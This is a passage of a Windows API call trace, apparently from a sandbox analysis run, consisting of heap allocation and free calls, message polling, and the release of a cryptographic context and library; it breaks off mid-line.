[0225.217] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0225.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0225.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0225.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0225.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0225.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0225.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0225.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0225.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0225.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0225.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0225.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0225.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0225.218] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0225.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0225.218] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0225.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0225.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0225.218] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0225.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0225.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0225.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0225.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69888 [0225.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0225.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0225.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0225.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0225.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0225.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0225.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0225.218] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0225.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0225.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0225.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0225.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0225.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0225.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0225.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0225.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0225.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0225.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0225.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0225.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0225.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0225.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0225.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0225.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0225.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0225.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0225.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0225.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0225.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0225.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f530 | out: hHeap=0x970000) returned 1 [0225.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0225.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3a0 | out: hHeap=0x970000) returned 1 [0225.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0225.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f800 | out: hHeap=0x970000) returned 1 [0225.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0225.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0225.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0225.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0225.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0225.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0225.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0225.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0225.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f760 | out: hHeap=0x970000) returned 1 [0225.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0225.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0225.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0225.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0225.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0225.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0225.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0225.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0225.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0225.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0225.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0225.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0225.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f508 | out: hHeap=0x970000) returned 1 [0225.220] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0225.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f670 [0225.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0225.220] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0225.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f670 | out: hHeap=0x970000) returned 1 [0225.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0225.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d10 [0225.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0225.220] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0225.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04460 [0225.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0225.220] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0225.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04460 | out: hHeap=0x970000) returned 1 [0225.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0225.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ce0 [0225.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0225.221] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0225.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0225.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0225.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0225.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0225.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c28 [0225.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0225.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0225.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0225.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0225.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d70 [0225.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0225.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50de8 [0225.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f38 [0225.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ed8 [0225.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f508 [0225.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0225.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f50 [0225.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50dd0 [0225.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e48 [0225.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0225.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0225.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0225.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0225.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0225.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0225.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0225.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0225.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0225.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0225.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0225.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0225.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f508 | out: hHeap=0x970000) returned 1 [0225.222] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0225.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0225.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0225.222] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0225.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0225.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04348 [0225.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0225.222] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0225.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04348 | out: hHeap=0x970000) returned 1 [0225.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0225.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f38 [0225.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0225.222] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0225.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0225.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0225.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0225.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0225.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0225.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0225.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0225.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0225.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0225.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0225.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0225.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0225.223] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0225.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0225.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0225.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0225.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04540 [0225.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0225.223] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0225.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04540 | out: hHeap=0x970000) returned 1 [0225.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0225.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ce0 [0225.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0225.223] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0225.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0225.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0225.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0225.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0225.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0225.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0225.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0225.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0225.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0225.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0225.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0225.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0225.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0225.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0225.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0225.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0225.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0225.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0225.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0225.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f508 [0225.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0225.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0225.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0225.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f530 [0225.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0225.224] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0225.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f530 | out: hHeap=0x970000) returned 1 [0225.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0225.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ef0 [0225.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0225.225] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0225.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0225.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0225.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0225.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0225.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0225.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0225.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0225.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0225.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0225.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0225.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0225.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0225.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0225.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0225.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0225.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0225.225] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0225.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0225.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0225.226] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0225.226] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e699c8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0225.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0225.226] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0225.226] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0225.226] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0225.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f045e8 | out: hHeap=0x970000) returned 1 [0225.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0225.226] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0225.226] FreeLibrary (hLibModule=0x756e0000) returned 1 [0225.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0225.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0225.226] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0225.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0225.227] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0225.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0225.227] HeapFree (in: hHeap=0x970000, 